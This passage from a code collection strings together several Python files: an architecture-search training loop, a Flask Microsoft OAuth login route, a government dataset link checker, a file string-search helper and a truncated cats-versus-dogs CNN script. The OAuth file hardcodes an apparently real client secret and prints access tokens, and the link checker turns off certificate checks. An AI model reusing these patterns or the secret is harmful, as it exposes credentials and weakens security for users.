grad_clip: float,\n    w_lr: float,\n    
logging_freq: int,\n    grad_inner_loop_order: int,\n    grad_outer_loop_order:int,\n    hvp: str,\n    arch_train_data:str,\n    normalize_a_lr:bool,\n    log_grad_norm:bool,\n    log_alphas:bool,\n    w_warm_start:int,\n    extra_weight_decay:float\n):\n    train_loader = torch.utils.data.DataLoader(\n        dset_train, batch_size=batch_size * T, shuffle=True\n    )\n    val_loader = torch.utils.data.DataLoader(dset_val, batch_size=batch_size)\n    grad_compute_speed = AverageMeter()\n\n    for epoch in range(num_epochs):\n        model.train()\n\n        epoch_loss = AverageMeter()\n        true_batch_index = 0\n        \n        val_iter = iter(val_loader)\n        for batch_idx, batch in enumerate(train_loader):\n\n            xs, ys = torch.split(batch[0], batch_size), torch.split(\n                batch[1], batch_size\n            )\n\n            weight_buffer = WeightBuffer(T=T, checkpoint_freq=w_checkpoint_freq)\n            for intra_batch_idx, (x, y) in enumerate(zip(xs, ys)):\n                weight_buffer.add(model, intra_batch_idx)\n\n                y_pred = model(x)\n\n                param_norm = 0\n                if extra_weight_decay is not None and extra_weight_decay != 0:\n                    for weight in model.weight_params():\n                        param_norm = param_norm + torch.pow(weight.norm(2), 2)\n\n                loss = criterion(y_pred, y) + param_norm\n                epoch_loss.update(loss.item())\n\n                grads = torch.autograd.grad(\n                    loss,\n                    model.weight_params(),\n                    retain_graph=True,\n                    create_graph=True,\n                )\n\n                w_optimizer.zero_grad()\n\n                with torch.no_grad():\n                    for g, w in zip(grads, model.weight_params()):\n                        w.grad = g\n                torch.nn.utils.clip_grad_norm_(model.parameters(), grad_clip)\n\n                w_optimizer.step()\n                true_batch_index += 1\n                wandb.log(\n                    {\n                        \"Train loss\": epoch_loss.avg,\n                        \"Epoch\": epoch,\n                        \"Batch\": true_batch_index,\n                    }\n                )\n\n                if true_batch_index % logging_freq == 0:\n                    print(\n                        \"Epoch: {}, Batch: {}, Loss: {}, Alphas: {}\".format(\n                            epoch,\n                            true_batch_index,\n                            epoch_loss.avg,\n                            [x.data for x in model.arch_params()],\n                        )\n                    )\n\n            val_xs = None\n            val_ys = None\n            if arch_train_data == \"val\":\n                try:\n                    val_batch = next(val_iter)\n                    val_xs, val_ys = torch.split(val_batch[0], batch_size), torch.split(\n                        val_batch[1], batch_size\n                    )\n\n                except:\n                    val_iter = iter(val_loader)\n                    val_batch = next(val_iter)\n                    val_xs, val_ys = torch.split(val_batch[0], batch_size), torch.split(\n                        val_batch[1], batch_size\n                    )\n\n\n            if epoch >= w_warm_start:\n                start_time = time.time()\n                total_arch_gradient = sotl_gradient(\n                    model=model,\n                    criterion=criterion,\n                    xs=xs,\n                    ys=ys,\n                    weight_buffer=weight_buffer,\n                    w_lr=w_lr,\n                    hvp=hvp,\n                    inner_loop_order=grad_inner_loop_order,\n                    outer_loop_order=grad_outer_loop_order,\n                    T=T,\n                    normalize_a_lr=normalize_a_lr,\n                    weight_decay_term=None,\n                    val_xs=val_xs,\n                    val_ys=val_ys\n                )\n                grad_compute_speed.update(time.time() - start_time)\n\n\n                if log_grad_norm:\n                    norm = 0\n                    for g in total_arch_gradient:\n                        norm = norm + g.data.norm(2).item()\n                    wandb.log({\"Arch grad norm\": norm})\n\n                if log_alphas:\n                    if hasattr(model, \"fc1\") and hasattr(model.fc1, \"degree\"):\n                        wandb.log({\"Alpha\":model.fc1.degree.item()})\n\n                a_optimizer.zero_grad()\n\n                for g, w in zip(total_arch_gradient, model.arch_params()):\n                    w.grad = g\n                torch.nn.utils.clip_grad_norm_(model.arch_params(), grad_clip)\n                a_optimizer.step()\n\n        val_results = valid_func(\n            model=model, dset_val=dset_val, criterion=criterion, print_results=False\n        )\n        print(\"Epoch: {}, Val Loss: {}\".format(epoch, val_results.avg))\n        wandb.log({\"Val loss\": val_results.avg, \"Epoch\": epoch})\n    wandb.run.summary[\"Grad compute speed\"] = grad_compute_speed.avg\n\n    print(f\"Grad compute speed: {grad_compute_speed.avg}s\")\n\n\ndef valid_func(model, dset_val, criterion, 
print_results=True):\n    model.eval()\n    val_loader = torch.utils.data.DataLoader(dset_val, batch_size=32)\n\n    val_meter = AverageMeter()\n    with torch.no_grad():\n        for batch in val_loader:\n            x, y = batch\n            y_pred = model(x)\n            val_loss = criterion(y_pred, y)\n            val_meter.update(val_loss.item())\n    if print_results:\n        print(\"Val loss: {}\".format(val_meter.avg))\n    return val_meter\n\n\ndef train_normal(\n    num_epochs, model, dset_train, batch_size, grad_clip, logging_freq, criterion, w_optimizer, optim=\"sgd\", **kwargs\n):\n    train_loader = torch.utils.data.DataLoader(\n        dset_train, batch_size=batch_size, shuffle=True\n    )\n\n    model.train()\n    for epoch in range(num_epochs):\n\n        epoch_loss = AverageMeter()\n        for batch_idx, batch in enumerate(train_loader):\n            x, y = batch\n            w_optimizer.zero_grad()\n\n            y_pred = model(x)\n            loss = criterion(y_pred, y)\n            loss.backward(retain_graph=True)\n\n            epoch_loss.update(loss.item())\n            if optim == \"newton\":\n                linear_weight = list(model.weight_params())[0]\n                hessian_newton = torch.inverse(\n                    hessian(loss * 1, linear_weight, linear_weight).reshape(\n                        linear_weight.size()[1], linear_weight.size()[1]\n                    )\n                )\n                with torch.no_grad():\n                    for w in model.weight_params():\n                        w = w.subtract_(torch.matmul(w.grad, hessian_newton))\n            elif optim ==\"sgd\":\n                torch.nn.utils.clip_grad_norm_(model.weight_params(), grad_clip)\n                w_optimizer.step()\n            else:\n                raise NotImplementedError\n            \n            wandb.log(\n                {\"Train loss\": epoch_loss.avg, \"Epoch\": epoch, \"Batch\": batch_idx}\n            )\n\n            if batch_idx % logging_freq == 0:\n                print(\n                    \"Epoch: {}, Batch: {}, Loss: {}, Alphas: {}\".format(\n                        epoch, batch_idx, epoch_loss.avg, model.fc1.alphas.data\n                    )\n                )\n\n\ndef main(num_epochs = 50,\n    batch_size = 64,\n    D = 18,\n    N = 50000,\n    w_lr = 1e-4,\n    w_momentum=0.9,\n    w_weight_decay=0,\n    a_lr = 3e-4,\n    a_momentum = 0.9,\n    a_weight_decay = 0,\n    T = 10,\n    grad_clip = 1,\n    logging_freq = 200,\n    w_checkpoint_freq = 1,\n    max_order_y=7,\n    noise_var=0.25,\n    featurize_type=\"fourier\",\n    initial_degree=100,\n    hvp=\"finite_diff\",\n    arch_train_data=\"val\",\n    normalize_a_lr=True,\n    w_warm_start=0,\n    extra_weight_decay=0.5,\n    grad_inner_loop_order=-1,\n    grad_outer_loop_order=-1,\n    ):\n    config = locals()\n\n    wandb_auth()\n    wandb.init(project=\"NAS\", group=f\"Linear_SOTL\", config=config)\n\n    ### MODEL INIT\n    # x, y = data_generator(N, max_order_generated=D, max_order_y=[(5,7), (9,13)], noise_var=0.25, featurize_type='fourier')\n    # x, y = get_datasets(\"songs\")\n\n    dset_train, dset_val = get_datasets(name=\"MNIST\", data_size=N, max_order_generated=D,\n        max_order_y=max_order_y,\n        noise_var=noise_var,\n        featurize_type=featurize_type)\n\n    model = SoTLNet(num_features=int(len(dset_train[0][0])), layer_type=\"MNIST\", degree=-1, weight_decay=extra_weight_decay)\n\n    criterion = MSELoss()  # simple regression criterion (MSELoss is imported above)\n    w_optimizer = SGD(model.weight_params(), lr=w_lr, momentum=w_momentum, weight_decay=w_weight_decay)\n    a_optimizer = SGD(model.arch_params(), lr=a_lr, momentum=a_momentum, weight_decay=a_weight_decay)\n\n    wandb.watch(model, log=\"all\")\n    train_bptt(\n        num_epochs=num_epochs,\n        model=model,\n        criterion=criterion,\n        w_optimizer=w_optimizer,\n        a_optimizer=a_optimizer,\n        dset_train=dset_train,\n        dset_val=dset_val,\n        logging_freq=logging_freq,\n        batch_size=batch_size,\n        T=T,\n        grad_clip=grad_clip,\n        w_lr=w_lr,\n        w_checkpoint_freq=w_checkpoint_freq,\n        grad_inner_loop_order=grad_inner_loop_order,\n        grad_outer_loop_order=grad_outer_loop_order,\n        hvp=hvp,\n        arch_train_data=arch_train_data,\n        normalize_a_lr=normalize_a_lr,\n        log_grad_norm=True,\n        
log_alphas=True,\n        w_warm_start=w_warm_start,\n        extra_weight_decay=extra_weight_decay\n    )\n    # train_normal(num_epochs=num_epochs, model=model, dset_train=dset_train, criterion=criterion,\n    #     w_optimizer=w_optimizer, logging_freq=logging_freq, batch_size=batch_size, grad_clip=grad_clip, optim=\"sgd\")\n\n    # NOTE: the least-squares comparison below relies on the synthetic (x, y) pair\n    # produced by the commented-out data_generator call above.\n    lapack_solution, res, eff_rank, sing_values = scipy.linalg.lstsq(x, y)\n    print(f\"Cond number:{abs(sing_values.max()/sing_values.min())}\")\n\n    val_meter = valid_func(model=model, dset_val=dset_val, criterion=criterion)\n\n    model.fc1.weight = torch.nn.Parameter(torch.tensor(lapack_solution))\n\n    val_meter2 = valid_func(model=model, dset_val=dset_val, criterion=criterion)\n\n    print(\n        f\"Trained val loss: {val_meter.avg}, SciPy solver val loss: {val_meter2.avg}, difference: {val_meter.avg - val_meter2.avg} (ie. {(val_meter.avg/val_meter2.avg-1)*100}% more)\"\n    )\n\n    true_degree = max_order_y/2 \n    trained_degree = model.fc1.alphas.item()\n    print(f\"True degree: {true_degree}, trained degree: {trained_degree}, difference: {abs(true_degree - trained_degree)}\")\n    wandb.run.summary[\"degree_mismatch\"] = abs(true_degree-trained_degree)\n\nif __name__ == \"__main__\":\n    try:\n        __IPYTHON__\n        main()\n\n    except KeyboardInterrupt:\n        pass\n    except:\n        fire.Fire(main)\n\n\nnum_epochs = 50\nbatch_size = 64\nD = 18\nN = 50000\nw_lr = 1e-3\nw_momentum=0.9\nw_weight_decay=0.1\na_lr = 3e-3\na_momentum = 0.9\na_weight_decay = 0.2\nT = 10\ngrad_clip = 1\nlogging_freq = 200\nw_checkpoint_freq = 1\nmax_order_y=7\nnoise_var=0.25\nfeaturize_type=\"fourier\"\ninitial_degree=1\nhvp=\"exact\"\nnormalize_a_lr=True\nw_warm_start=0\nextra_weight_decay=1\ngrad_inner_loop_order=-1\ngrad_outer_loop_order=-1","sub_path":"linear/luketina.py","file_name":"luketina.py","file_ext":"py","file_size_in_byte":11804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"502591273","text":"import adal\nfrom app import app\nfrom flask import Flask, request, Response\nimport uuid\nimport requests\nimport urllib\n\nCLIENT_ID = 'a273ed9e-915c-4e0f-9109-ec2541deb7b5'\nCLIENT_SECRET = 'F*denrd?/+pHjNV7lKcO6K309b?t9gHE'\nBASEURL = 'http://localhost:3000'\nRESOURCE = 'https://graph.microsoft.com'\nAPI_VERSION = 'v1.0'\nTENANT = 'am.amrita.edu'\nAUTHORITY_URL = 'https://login.microsoftonline.com/' + TENANT\nREDIRECT_URI = BASEURL + '/getAToken'\nAUTHORIZE_URL = 'https://login.microsoftonline.com/am.amrita.edu/oauth2/authorize?'+'response_type=code&client_id='+ CLIENT_ID +'&redirect_uri={}/getAToken'+'&'+'state={}'\n\n@app.route(\"/\")\ndef main():\n    return \"IDENTITY\"\n\n@app.route(\"/auth/\")\ndef auth_begin():\n    return \"Hello\"\n\n@app.route(\"/id/authorize/\")\ndef 
login():\n    client_id = request.args['client_id']\n    client_redirect_uri = request.args['redirect_uri']\n    redirect_uri = BASEURL + '/microsoft/token?client_id={}&redirect_uri={}'.format(client_id, urllib.quote(client_redirect_uri))\n    auth_state = str(uuid.uuid4())\n    resp = Response(status=307)\n    resp.headers['location'] = AUTHORIZE_URL.format(urllib.quote(redirect_uri), auth_state)\n    return resp\n\n@app.route(\"/microsoft/token\")\ndef main_logic():\n    code = request.args['code']\n    auth_context = adal.AuthenticationContext(AUTHORITY_URL)\n    clientid = request.args['client_id']\n    token_response = auth_context.acquire_token_with_authorization_code(code, REDIRECT_URI, 'https://graph.microsoft.com', CLIENT_ID, CLIENT_SECRET)\n    token = token_response['accessToken']\n    print(token)\n    endpoint = RESOURCE + '/' + API_VERSION + '/me/'\n    http_headers = {'Authorization': 'Bearer ' + token,\n                    'Accept': 'application/json',\n                    'Content-Type': 'application/json',\n                    'client-request-id': str(uuid.uuid4())}\n    print(http_headers)\n    graph_data = requests.get(endpoint, headers=http_headers, stream=False).json()\n    return graph_data","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"236909290","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport time\nimport datetime\nimport sys\nimport logging\nimport tempfile\nimport gzip\nimport json\nfrom collections import defaultdict\n\nimport lmdb\n\nimport requests\nimport asyncio\nfrom functools import partial\nfrom requests.models import Response\nimport urllib\nfrom urllib.request import urlopen\nimport traceback\nimport unicodecsv\nimport codecs\n\nproxy = os.environ.get('http_proxy', '')  # optional; the code below checks `if proxy:`\ntemp_db = '/tmp/od_linkcheker2.db'\n\ndef test_ftp(url):\n    res = Response()\n    try:\n        req = urllib.request.Request(url)\n        if proxy:\n            req.set_proxy(proxy, 'http')\n        response = urlopen(req, timeout=30)\n        chunk = response.read(16)\n        if len(chunk) == 16:\n            res.status_code = 200\n        else:\n            res.status_code = 404\n    except:\n        res.status_code = 404\n    print(url, res.status_code)\n    return res\n\nUSER_AGENT=\"open.canada.ca dataset link checker; abuse report open-ouvert@tbs-sct.gc.ca\"\n\n\ndef get_a_byte(response, *args, **kwargs):\n    if response.status_code == requests.codes.ok:\n        count = 0\n        for line in response.iter_content():\n            count += (len(line))\n            if count > 0:\n                print(response.url, count)\n                response.close()\n                break\n\n\n@asyncio.coroutine\ndef test_urls(urls, results):\n    loop = asyncio.get_event_loop()\n    futures =[]\n    for url in urls:\n        if url[:6].lower() =='ftp://':\n            future = loop.run_in_executor(None, test_ftp,url)\n        else:\n            future = loop.run_in_executor(None, partial(requests.get, headers={\"user-agent\":USER_AGENT},\n                hooks={'response': get_a_byte}, verify=False,\n                timeout=30, stream=True), url)\n        futures.append(future)\n    for future in futures:\n        try:\n            res = yield from future\n        except requests.exceptions.ProxyError:\n            print('proxy error', urls[ futures.index(future)])\n            res = Exception()\n        except requests.exceptions.ReadTimeout:\n            print('timeout', urls[ futures.index(future)])\n            res = Exception()\n        except (requests.exceptions.InvalidSchema, requests.exceptions.InvalidURL):\n            print('invalidURL', urls[ futures.index(future)])\n            res = Response()\n            res.status_code = 404\n        except:\n            import traceback\n            traceback.print_exc()\n            res = Exception()\n        results.append(res)\n\n\nclass Records():\n    def __init__(self, file, verbose):\n        self.file = 
file\n        self.download_file = None\n        self.verbose = verbose\n        mapsize = 100 * 1024 * 1024 * 1024\n        self.env = lmdb.open(temp_db, map_size=mapsize, sync=False)\n        #self.txn = self.env.begin(write=True)\n\n    #p_records = site.action.current_package_list_with_resources( offset=start, limit=rows)\n    def __del__(self):\n        self.env.close()\n        if not self.file:\n            if self.download_file:\n                os.unlink(self.download_file)\n                print('temp file deleted', self.download_file)\n\n    def download(self):\n        if not self.file:\n            # dataset http://open.canada.ca/data/en/dataset/c4c5c7f1-bfa6-4ff6-b4a0-c164cb2060f7\n            url='http://open.canada.ca/static/od-do-canada.jl.gz'\n            r = requests.get(url, stream=True)\n\n            f = tempfile.NamedTemporaryFile(delete=False)\n            for chunk in r.iter_content(1024 * 64):\n                f.write(chunk)\n            f.close()\n            self.download_file = f.name\n\n        records = []\n        fname = self.file or f.name\n        try:\n            with gzip.open(fname, 'rb') as fd:\n                for line in fd:\n                    records.append(json.loads(line.decode('utf-8')))\n                    if len(records) >= 50:\n                        yield (records)\n                        records = []\n                if len(records) >0:\n                    yield (records)\n        except GeneratorExit:\n            pass\n        except:\n            import traceback\n            traceback.print_exc()\n            print('error reading downloaded file')\n\n    def test_links(self, new_url, urls):\n        links = []\n        results = []\n        for k,v in new_url.items():\n            links.append(k)\n        loop = asyncio.get_event_loop()\n        loop.run_until_complete(test_urls(links, results))\n        with self.env.begin(write=True) as txn:\n            now = time.time()\n            results = zip(links, results)\n            for url, response in results:\n                if type(response) is Exception:\n                    res={'timestamp': now,\n                        'status': -1,\n                        'resources': new_url[url]}\n                else:\n                    res={'timestamp': now,\n                        'status':response.status_code}\n                    if response.status_code != requests.codes.ok:\n                        res['resources'] = new_url[url]\n                        res['org'] = urls.get(url, None)\n                txn.put(url.encode('utf-8'), json.dumps(res).encode('utf-8'))\n        if links:\n            time.sleep(5) # break\n\n    def get_resources(self):\n        count = 0\n        new_url = defaultdict(list)\n        urls = {}\n        for records in self.download():\n            now = time.time()\n            count += len(records)\n            with self.env.begin() as txn:\n                for record in records:\n                    id = record['id']\n                    for res in record['resources']:\n                        if (not res['url_type']) and res.get('url'):\n                            #print(res)\n                            url= res['url']\n                            details =txn.get(url.encode('utf-8'))\n                            if details:\n                                details = json.loads(details.decode('utf-8'))\n                                if False: #short re-run test\n                                    if now - details.get('timestamp', 0) < 34 * 3600 and (details['status']!= -1):\n                                        continue\n                                #if details['status'] == requests.codes.ok:\n                                if False:\n                                    if details['status'] != -1 or url[:7]!='http://':\n                                        continue\n                                if details['status'] == requests.codes.ok:\n                                    continue\n                            new_url[url].append('/'.join([id, res['id']]))\n                            if record.get('organization'):\n                                urls[url]={'name': record['organization']['name'],\n                                    'title': record['organization']['title']}\n                        if len(new_url) >=500:\n                            self.test_links(new_url, urls)\n                            new_url = defaultdict(list)\n                            urls = {}\n        if new_url:\n            self.test_links(new_url, urls)\n        print ('total record count: ', count)\n\n    def dumpBrokenLink(self):\n        outf=open('/tmp/brokenlink.csv', 'wb')\n        outf.write(codecs.BOM_UTF8)\n        out = unicodecsv.writer(outf)\n        out.writerow(['organization name', 'status', 'link', 'dataset_id/resource_id'])\n        data = defaultdict(list)\n        with self.env.begin() as txn:\n            for url, value in txn.cursor():\n                details = json.loads(value.decode('utf-8'))\n                if details['status'] != requests.codes.ok:\n                    #print(url.decode('utf-8'), details)\n                    org_name = details['org']['name'] if details.get('org') else 
'unknown_org'\n                    data[org_name].append([url, details['resources'], details['status']])\n        count, count2 = 0, 0\n        for name, urls in data.items():\n            for url, res, status in urls:\n                status_str = status if status!= -1 else 'timeout'\n                out.writerow([name, status_str, url.decode('utf-8'), json.dumps(res)])\n                count += 1\n                if status ==-1:\n                    count2 += 1\n        outf.close()\n        print(self.env.info())\n        print(self.env.stat())\n        print('total {0} dumped, timeout_count {1}'.format(count, count2))\n\n    def dumpBrokenLink_v2(self):\n        outf=open('/tmp/brokenlink.csv', 'wb')\n        outf.write(codecs.BOM_UTF8)\n        out = unicodecsv.writer(outf)\n        #Header\n        out.writerow(['Metadata ID / Métadonnées ID',\n            'Metadata Record Portal Type / Type de portail de la record de métadonnées',\n            'Metadata Record Name English / Nom de la record de la métadonnées anglais',\n            'Metadata Record Name French / Nom de la record de la métadonnées français',\n            \"Department Name English / Nom du ministère en anglais\",\n            \"Department Name French / Nom du ministère en français\",\n            \"Resource Name English / Nom de la ressource en anglais\",\n            \"Resource Name French / Nom de la ressource en français\",\n            \"Year / Année\",\n            \"Month / Mois\",\n            \"Broken Link / Lien brisé\",\n            \"Status / Statut\", \n            ])\n        data = {}\n        with self.env.begin() as txn:\n            for url, value in txn.cursor():\n                details = json.loads(value.decode('utf-8'))\n                if details['status'] != requests.codes.ok:\n                    #print(url.decode('utf-8'), details)\n                    for res_id in details['resources']:\n                        data[res_id] = {'status':details['status']}\n\n        for records in self.download():\n            for record in records:\n                id = record['id']\n                for res in record['resources']:\n                    if (not res['url_type']) and res.get('url'):\n                        #print(res)\n                        url= res['url']\n                        full_id = '/'.join([id, res['id']])\n                        detail = data.get(full_id, None)\n                        if not detail: continue\n                        time_str = res.get('last_modified')\n                        if not time_str:\n                            time_str = res.get('created')\n                        try:\n                            timestamp = datetime.datetime.strptime(time_str, \"%Y-%m-%dT%H:%M:%S.%f\")\n                        except:\n                            timestamp = None\n                        detail.update({\n                            'metadata_id': full_id,\n                            'portal_type': record['type'],#record['collection'],\n                            'record_name_en': record['title_translated']['en'],\n                            'record_name_fr': record['title_translated']['fr'], \n                            'org_name_en': record['organization']['title'].split('|')[0],\n                            'org_name_fr': record['organization']['title'].split('|')[-1],\n                            'name_en': res['name_translated']['en'],\n                            'name_fr': res['name_translated']['fr'],\n                            'year': timestamp.year if timestamp else None,\n                            'month': timestamp.month if timestamp else None,\n                            'link': url,\n                            })\n                        \n\n        #write to csv\n        count, count2 = 0, 0\n        portal_type_dict = {'dataset': \"Open Data / Données ouvertes\",\n            'info': \"Open Information / Information ouverte\",\n            }\n        for id, res in data.items():\n            status = res['status'] if res['status']!= -1 else 'timeout / délai expiré'\n            portal_type = portal_type_dict.get(res['portal_type'], None)\n            line=[res['metadata_id'], portal_type, res['record_name_en'], res['record_name_fr'],\n                res['org_name_en'], res['org_name_fr'], res['name_en'], res['name_fr'],\n                res['year'], res['month'], res['link'], status]\n            out.writerow(line)\n            count += 1\n            if status == 'timeout / délai expiré':\n                count2 += 1\n        outf.close()\n        print(self.env.info())\n        print(self.env.stat())\n        print('total {0} dumped, timeout_count {1}'.format(count, count2))\n\n    def searchUrl(self, url):\n        with self.env.begin() as txn:\n            details =txn.get(url.encode('utf-8'))\n            if details:\n                details = json.loads(details.decode('utf-8'))\n                print(details)\n            else:\n                print('Not 
found')\n\n    def addOrg(self):\n        for records in self.download():\n            urls = {}\n            with self.env.begin() as txn:\n                for record in records:\n                    for res in record['resources']:\n                        if (not res['url_type']) and res.get('url'):\n                            url= res['url']\n                            try:\n                                details =txn.get(url.encode('utf-8'))\n                            except:\n                                traceback.print_exc()\n                                sys.exit(-1)\n                            if details:\n                                details = json.loads(details.decode('utf-8'))\n                                if (not details.get('org')) and record.get('organization'):\n                                    try:\n                                        details['org']={'name': record['organization']['name'],\n                                            'title': record['organization']['title']}\n                                        urls[url] = details\n                                    except:\n                                        pass\n            with self.env.begin(write=True) as txn:\n                for url, details in urls.items():\n                    txn.put(url.encode('utf-8'), json.dumps(details).encode('utf-8'))\n\n\ndef main():\n    parser = argparse.ArgumentParser(description='Search portal records broken resource link')\n    parser.add_argument(\"--file\", dest=\"file\", help=\"site file\")\n    parser.add_argument(\"--quiet\", dest=\"verbose\", action='store_false', default=True)\n    parser.add_argument(\"--dump\", dest=\"dump\",action='store_true',default=False)\n    parser.add_argument(\"--search\", dest=\"search\")\n    parser.add_argument(\"--org\", dest=\"org\", action='store_true',default=False)\n\n    options = parser.parse_args()\n\n    user_agent = None\n\n    site = Records(options.file, options.verbose)\n    if options.dump:\n        site.dumpBrokenLink_v2()\n        return\n    elif options.search:\n        site.searchUrl(options.search)\n        return\n    elif options.org:\n        site.addOrg()\n        return\n    site.get_resources()\n\n\nif __name__ == '__main__':\n    main()\n    sys.exit(0)\n","sub_path":"browse_resources.py","file_name":"browse_resources.py","file_ext":"py","file_size_in_byte":15101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"191343924","text":"import os\nimport time\nfrom collections import defaultdict\nimport inspect\n\nIMPORT_WORDS = ['import', 'from']\n\ndef find_in_files(root_dir, f_types_list, seek_strings_list):\n    \"\"\"search files in a directory tree for strings\n    \n    Args:\n        root_dir: search tree root\n        f_types_list: list of file extensions (with '.') like ['.py', '.wdl', '.json', 'etc']\n        seek_strings_list: list of strings to hunt for in files of f-type in the root_dir\n    \n    Returns:\n        file_targets_line: dict of file-names: dict of locations for seek strings\n        target_files_dict: dict of seek-list-string: to list of files containing it\n        (empty if no seek_list strings found)\n    \"\"\"\n    search_start_time = time.time()\n    number_of_files_checked = 0\n    \n    # initialize the (empty) return values\n    file_targets_line = defaultdict(dict)\n    target_files_dict = defaultdict(list)\n    \n    # fail immediately if the root directory is not available\n    if not os.path.isdir(root_dir):\n        print('Unable to locate root directory:\\n', root_dir)\n        return file_targets_line, target_files_dict\n    \n    # guard the file types list input\n    if isinstance(f_types_list, str):\n        f_types = [f_types_list]\n    elif isinstance(f_types_list, list):\n        f_types = f_types_list\n    else:\n        print('Unable to process file types input. 
Need: [\".py\", \".ipynb\"]\\nGot:\\n', f_types_list)\n return file_targets_line, target_files_dict\n \n # guard user misuse where file extensions do not start with period character\n for i in range(len(f_types_list)):\n if f_types_list[i][0] != '.':\n f_types_list[i] = ''.join('.', f_types_list[i])\n \n # guard the list of strings to find in the files of type\n if isinstance(seek_strings_list, str):\n seek_list = [seek_strings_list]\n elif isinstance(seek_strings_list, list):\n seek_list = seek_strings_list\n else:\n print('Bad seek string input. Need: [\"ducks\", \"turles\"]\\nGot:\\n', seek_strings_list)\n return file_targets_line, target_files_dict\n \n # for every directory in the input root directory\n for d, dl, fl in os.walk(root_dir):\n \n # for each file in that directory\n for f in fl:\n \n # it the file is of one of the input types\n if os.path.splitext(f)[1] in f_types:\n \n full_file = os.path.join(d, f)\n \n lines = []\n \n try:\n with open(full_file, 'r') as fh:\n lines = fh.readlines()\n \n except:\n print('Unable to open file:\\n%s\\n', full_file)\n \n finally:\n \n # if the file was opened and not empty\n if len(lines) > 0:\n number_of_files_checked += 1\n \n # read each line in the file\n for line_n in range(len(lines)):\n line = lines[line_n]\n \n # check each string in the input list\n for s in seek_list:\n \n if s in line:\n \n # append the dictionary of target_word : files\n target_files_dict[s].append(full_file)\n \n # Note: this will require reader to use the same space replacement chars\n s_line = s.replace(' ', '_')\n \n # add the line number to the dictionary of files.target_word : locations\n if s_line in file_targets_line[full_file]:\n file_targets_line[full_file][s_line].append(line_n)\n \n else:\n file_targets_line[full_file][s_line] = [line_n]\n\n # alphabetize the target-word : filename dictionary\n if len(target_files_dict) > 1:\n for k in target_files_dict.keys():\n target_files_dict[k] = sorted(list(set(target_files_dict[k])))\n \n # Brag about it (er maybe not)\n tt = time.time() - search_start_time\n print('%s searched in %i files in %0.3f s'%(inspect.stack()[0][3], number_of_files_checked, tt))\n \n return file_targets_line, target_files_dict\n","sub_path":"src/stringy_stuff.py","file_name":"stringy_stuff.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"339991802","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport os\nimport csv\nfrom random import shuffle\nimport tflearn\nfrom tflearn.layers.conv import conv_2d, max_pool_2d\nfrom tflearn.layers.core import input_data, dropout, fully_connected\nfrom tflearn.layers.estimator import regression\nimport tensorflow as tf\n\ndir_train = '/home/srikumar/Desktop/ENPM673_Perception_for_autonomous_robots/Project6/train/'\ndir_test = '/home/srikumar/Desktop/ENPM673_Perception_for_autonomous_robots/Project6/test1/'\nsize= 200\nalpha = 0.001\nepoch = 15\nname = 'data-{}-{}-{}.model'.format(alpha,epoch, '2conv-basic')\n\ndef label_name(image): #To split names to dog and cats \n name = image.split('.')[0]\n if name =='cat':\n return [1,0]\n elif name=='dog':\n return [0,1]\n \ndef create_train_data():\n training_data = []\n for im in os.listdir(dir_train):\n label = label_name(im)\n path = os.path.join(dir_train,im)\n new_img = cv2.resize(cv2.imread(path,cv2.IMREAD_GRAYSCALE), (size,size))\n training_data.append([np.array(new_img),np.array(label)])\n shuffle(training_data) #To just 
shuffle data and make it random, and avoid overfitting\n    np.save('train_set.npy', training_data)\n    return training_data\n\n\ndef process_test_data():\n    test_data = []\n    for im in os.listdir(dir_test):\n        path = os.path.join(dir_test,im)\n        num = im.split('.')[0]\n        new_img = cv2.resize(cv2.imread(path,cv2.IMREAD_GRAYSCALE), (size,size))\n        test_data.append([np.array(new_img),num])\n    test_data.sort(key=lambda x:x[1])\n    shuffle(test_data) #To just shuffle data and make it random, and avoid overfitting\n    np.save('test_set.npy', test_data)\n    return test_data\n\ndef validate_train_set(c_net,train_set):\n    \n    #First layer\n    #For output filter size - 32\n    c_net = conv_2d(c_net, 32, 3, activation='relu', padding='same')\n    c_net = max_pool_2d(c_net, 3)\n    \n    #Second layer\n    #For output filter size - 64\n    c_net = conv_2d(c_net, 64, 3, activation='relu')\n    c_net = max_pool_2d(c_net, 3)\n    \n    #Third layer\n    #For output filter size - 128\n    c_net = conv_2d(c_net, 128, 3, activation='relu')\n    c_net = max_pool_2d(c_net, 3)\n    \n    #Fourth layer\n    #For output filter size - 64\n    c_net = conv_2d(c_net, 64, 3, activation='relu')\n    c_net = max_pool_2d(c_net, 3)\n    \n    \n    #Fifth layer\n    #For output filter size - 128\n    c_net = conv_2d(c_net, 128, 3, activation='relu')\n    c_net = max_pool_2d(c_net, 3)\n    \n    #Sixth layer\n    #For output filter size - 64\n    c_net = conv_2d(c_net, 64, 3, activation='relu')\n    c_net = max_pool_2d(c_net, 3)\n    \n    #Seventh layer\n    #For output filter size - 32\n    c_net = conv_2d(c_net, 32, 3, activation='relu')\n    c_net = max_pool_2d(c_net, 3)\n    \n    #Fully connected layer with 'relu' activation\n    c_net = fully_connected(c_net, 1024, activation='relu')\n    \n    #drop_out to avoid over-fitting\n    c_net = dropout(c_net, 0.9)\n    \n    #Fully connected layer with 'softmax' activation\n    c_net = fully_connected(c_net, 2, activation='softmax')\n    c_net = regression(c_net, optimizer='adam', learning_rate = alpha, loss = 'categorical_crossentropy', name='targets')\n    \n    model = tflearn.DNN(c_net, tensorboard_dir='log')\n    \n    if os.path.exists('{}.meta'.format(name)):\n        model.load(name)\n        print('model loaded!')\n        return model\n    \n    #Creating 2 new lists from train_set and labeling them as training and testing sub data sets\n    train_sub = train_set[:-2500] #choosing all but the last 2500 (22500) as the train dataset \n    test_sub = train_set[-2500:] #choosing the last 2500 as the test dataset\n    \n    #for fit\n    train_x = np.array([i[0] for i in train_sub]).reshape(-1, size, size, 1)\n    train_y = [i[1] for i in train_sub]\n    \n    #for testing accuracy\n    test_x = np.array([i[0] for i in test_sub]).reshape(-1, size, size, 1)\n    test_y = [i[1] for i in test_sub]\n    \n    model.fit({'input': train_x}, {'targets': 